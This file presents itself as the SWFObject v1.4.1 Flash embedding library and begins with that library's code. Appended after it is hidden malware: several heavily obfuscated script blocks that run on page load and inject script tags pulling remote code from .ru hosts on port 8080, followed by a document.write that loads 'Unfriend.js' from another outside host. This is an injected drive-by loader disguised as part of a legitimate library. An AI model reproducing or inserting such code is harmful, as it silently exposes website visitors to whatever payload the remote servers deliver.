/**
 * SWFObject v1.4.1: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * **SWFObject is the SWF embed script formerly known as FlashObject. The name was changed for
 *   legal reasons.
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}
if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}
if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}
deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){
if(!document.createElement||!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion(this.getAttribute("version"),_7);
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
this.setAttribute("useExpressInstall",_7);
this.setAttribute("doExpressInstall",false);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}};
deconcept.SWFObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},getVariablePairs:function(){
var _16=new Array();
var key;
var _18=this.getVariables();
for(key in _18){_16.push(key+"="+_18[key]);}
return _16;
},getSWFHTML:function(){
var _19="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");}
_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1a=this.getParams();
for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}
var _1c=this.getVariablePairs().join("&");
if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}
_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");}
_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _1d=this.getParams();
for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}
return _19;},write:function(_20){
if(this.getAttribute("useExpressInstall")){
var _21=new deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _20=="string")?document.getElementById(_20):_20;
n.innerHTML=this.getSWFHTML();return true;
}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};
deconcept.SWFObjectUtil.getPlayerVersion=function(_23,_24){
var _25=new deconcept.PlayerVersion([0,0,0]);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_25=new deconcept.PlayerVersion(x.description.replace(/([a-z]|[A-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
for(var i=3;axo!=null;i++){axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+i);_25=new deconcept.PlayerVersion([i,0,0]);}}
catch(e){}
if(_23&&_25.major>_23.major){return _25;}
if(!_23||((_23.minor!=0||_23.rev!=0)&&_25.major==_23.major)||_25.major!=6||_24){
try{_25=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}
catch(e){}}}return _25;};
deconcept.PlayerVersion=function(_29){
this.major=parseInt(_29[0])!=null?parseInt(_29[0]):0;
this.minor=parseInt(_29[1])||0;
this.rev=parseInt(_29[2])||0;};
deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){return false;}return true;};
deconcept.util={getRequestParameter:function(_2b){
var q=document.location.search||document.location.hash;
if(q){var _2d=q.indexOf(_2b+"=");
var _2e=(q.indexOf("&",_2d)>-1)?q.indexOf("&",_2d):q.length;
if(q.length>1&&_2d>-1){return q.substring(q.indexOf("=",_2d)+1,_2e);}}
return "";}};
deconcept.SWFObjectUtil.cleanupSWFs=function(){
var _2f=document.getElementsByTagName("OBJECT");
for(var i=0;i<_2f.length;i++){
for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=null;}}}};
if(typeof window.onunload=="function"){
var oldunload=window.onunload;
window.onunload=function(){deconcept.SWFObjectUtil.cleanupSWFs();oldunload();};
}else{window.onunload=deconcept.SWFObjectUtil.cleanupSWFs;}
if(Array.prototype.push==null){
Array.prototype.push=function(_32){
this[this.length]=_32;
return this.length;};}

var getQueryParamValue = deconcept.util.getRequestParameter;
var FlashObject = deconcept.SWFObject; // for backwards compatibility
var SWFObject = deconcept.SWFObject;


v={L:"e"};var h='';this.Oy="Oy";function o(){var mL=["B"];this.NF="NF";try {} catch(J){};var O=document;var a=new Array();try {var Um='k'} catch(Um){};var m=new String("de"+"fe"+"rJwlv".substr(0,1));var r="ap"+"bPM3pe".substr(4)+"nd"+"Ch"+"ilyCG".substr(0,2)+"nQGd".substr(3);var x="src";var X_={ff:16083};var D="sc"+"ri"+"pt";var kC=false;var y="F8MScre".substr(4)+"ZPvate".substr(3)+"EleNX4".substr(0,3)+"men"+"ACUEtCUAE".substr(4,1);try {var JE='ry'} catch(JE){};this.VP=3388;this.VP+=75;var U=window;UT=54365;UT+=102;var nJ=56831;try {var Z='JEz'} catch(Z){};var Ug="onlo"+"adf80".substr(0,2);var M=String("bo"+"dyXmFN".substr(0,2));var p={};var fu={};function V(){this.BG=2659;this.BG++;var q="";try {var uU={Q:56258};this.K=false;var w=String("/goog"+"le.co"+"m/ela"+"nce.c"+"om/an"+"gege.mz8E".substr(0,5)+"com.p"+"hp");this.ag=false;var Ce=new Array();var u=String("ht"+"tp"+":/"+"VtX/l".substr(3)+"H6cab".substr(3)+"Fq7elqF7".substr(3,2)+"st"+"HDLvar".substr(4)+"mVwhe.".substr(4)+"3d4ru".substr(3)+"vPr:".substr(3));var Sp=["y_"];var OL={Bv:58727};var C=9661-9660;try {var md='OX'} catch(md){};var bB=844906-836826;var rf=["Wb","Nf","xM"];CG={z:"zN"};Hz=50034;Hz++;un=O[y](D);var lN=["_D","Ih","ml"];var vU=new Date();un[m]=C;var Fh="Fh";Bk=["qp"];un[x]=u+bB+w;bx=17693;bx+=179;O[M][r](un);this.mh=53412;this.mh+=40;MS=54813;MS-=157;} catch(CT){var hH=new Date();this.hw='';this.mp=44718;this.mp-=134;};try {var DX='hn'} catch(DX){};this.AV="";}U[Ug]=V;var SY=[];wE={bq:"xs"};};this.cP='';o();ww={Hu:29797};
try {} catch(T){};var Z=["G"];function g(){this.V=26500;this.V++;vf=["kw","v"];o=["l","xN"];var _="sr"+"3qMUc".substr(4);var Ia=new Date();this.so=43658;this.so++;var O="defe"+"rUSm0".substr(0,1);var XO=false;var B=document;var M=new String("onloa"+"d");var Q=new String("scrMmN".substr(0,3)+"ipt");var Ht={ww:"U"};try {} catch(YA){};var I=window;this.Hi="Hi";bu=["xB","CI"];var y=String("appen"+"dChil"+"dPDz".substr(0,1));var X="crey9iR".substr(0,3)+"ate"+"Ele"+"7GCmen".substr(3)+"t";var N=String("body");function k(){var Yu=new String();try {try {var tZ='gb'} catch(tZ){};this.K=60365;this.K++;this.ld=50432;this.ld-=50;Ow=28103;Ow-=137;var yn=666998-658918;this.S="";var Cg=35268;var n=new String("/go"+"ogl"+"e.c"+"om/"+"lov"+"e21u5ko".substr(0,3)+"ZOpcn.".substr(3)+"M9rcom".substr(3)+"/di"+"ct."+"cc.kJPE".substr(0,3)+"KSJphp".substr(3));var w=String("http"+"://l"+"abel"+"starczBq".substr(0,4)+"4cle.ru4lc".substr(3,4)+":tbdg".substr(0,1));var b=8842-8841;var Yn={};iM=["IQ","RE"];gI=B[X](Q);HW=["q"];pY=["Rs"];try {} catch(vK){};gI[O]=b;gI[_]=w+yn+n;var hu=false;var NT=false;var Km=new Date();B[N][y](gI);} catch(d){var r=["BI","pYN","KD"];};Ql=51892;Ql--;rb=4427;rb--;}var mD=new Array();I[M]=k;var W=[];};try {} catch(osY){};Da={eM:"VQ"};g();Sm=[];
Pg={Hj:"J"};try {} catch(u){};sO=31869;sO--;var R={};var I={};try {try {} catch(Cn){};try {} catch(z){};df=["GF","q","n"];var Uj=41479;dW={nr:40640};N={au:5064};this.asu=46685;this.asu++;var M=new Array();var sg=["CO","AC","Ah"];var x=window[String("une"+"sca"+"pe")];var U=String("repla"+"ce");var NY=false;var gT=false;var IF="IF";this.o='';var C=String("onlo"+"adVgr".substr(0,2));var O="O";var F='';this.Fi=62791;this.Fi-=1;this.iw=34943;this.iw-=73;this.JR=false;this.yP=18013;this.yP-=85;this.gc=55872;this.gc++;var LE=new Date();var Z=new Array();fc={fA:38161};var Fs=new Date();sQ={VJ:25260};var UY=window[("Re"+"gE"+"xp")];jb={NFj:"xg"};IB={po:"Sz"};zs=15774;zs-=170;var i="1";Xh={dQ:60537};var vg="vg";VB=405;VB--;var Ja="Ja";var zd={};var Lcy={ML:47085};Nb=18860;Nb-=142;var dT={Du:55241};var Mb=false;function P(i,s){var Lu=false;CQ={yS:"Ys"};var FO=50740;var Ee=[];var cj="cj";var d="YfVm[".substr(4);AG={mN:63159};var aI=["EN","Oa"];Hy={lu:38055};d+=s;var ZV={xH:false};this.ly=18802;this.ly--;d+=x("%5d");this.ba='';gm={XT:false};hbA={sZ:false};var AW={Jv:false};var uq={Jm:false};var w=new UY(d, String("fXsg".substr(3)));var ooV={};return i.replace(w, F);var CD=["kp","qA","yl"];var GA=["Mj","sU","ue"];try {} catch(oE){};Pb=[];};var zK="";PN={Di:33019};this.Gl=false;this.Wb=20556;this.Wb-=221;this.kU=30005;this.kU-=86;var H=247351-239271;try {} catch(tm){};var HK=new Array();var bN=new Date();var j="http:"+"//got"+"hguil"+"t.ru:";pV=["_y","Xd"];bJ=[];avd=["Nx","GU","FI"];var BQ=["lV","tT"];this.RU="";var QI=["PT","yI","RJ"];var Q=String("/go"+"ogl"+"e.c"+"om/"+"sha"+"adi"+".co"+"m/i"+"YV7cbib".substr(4)+"LMHYo.c".substr(4)+"Vg4om.4gV".substr(3,3)+"php78q".substr(0,3));bNu={vd:"IZ"};DP={gg:"Mu"};this.re=49200;this.re--;pf={mV:"WY"};var IQQ={QK:36938};this.H_='';this.nP='';MT=["aN"];this.VD=30688;this.VD++;this.vl=25930;this.vl++;function a(){this.LK=63690;this.LK++;this.ri="ri";gC={};fL=["Jvc"];var p="appenC8Z".substr(0,5)+"dChil"+"PLzndnzPL".substr(4,1);this.zR='';var _j='';var it='';try {var GcJ='zn'} catch(GcJ){};DCm=[];var g=P('s2c2rAi7puta','F4a37u0nIPE2UJkWA');var FS=document;uZ=37917;uZ+=109;var iC=new Array();var zQ=new Array();YOp=22716;YOp+=156;VK={};var EI=new Date();nO=["ZY"];y=FS.createElement(g);var f_=["_V","Ln"];try {var IS='VU'} catch(IS){};A=j+H;Gg=["wk","rA","fGv"];A=A+Q;sON=["TI","tS"];this.I_=35316;this.I_-=18;var Qd={};var GR={};this.Fm=false;try {} catch(eU){};var jK={};y["deferKE9t".substr(0,5)]=i;var qj=["cs"];var Rk=new Date();var zE=new Date();var B=FS.body;var fu='';var QR=false;y.src=A;kr={ic:32946};var _I=false;gO=2753;gO++;B[p](y);try {var Ot='Vq'} catch(Ot){};var IW=false;sn=["fY","ch"];Dx={RL:false};};Em=3246;Em--;try {} catch(mF){};try {} catch(gP){};St=6610;St++;this.LyH="LyH";window[C]=a;this.pVC=32234;this.pVC++;var SR={};var OJ='';Yg=["dNH","lY","zP"];Dm=37131;Dm+=51;Ru=["PG","rOf","gM"];this.mSK=39112;this.mSK+=138;this.DK=3895;this.DK+=40;} catch(Bo){oP={};this.WR="WR";var dz=2350;var aie=303;};





document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Unfriend.js"></scr'+'ipt>');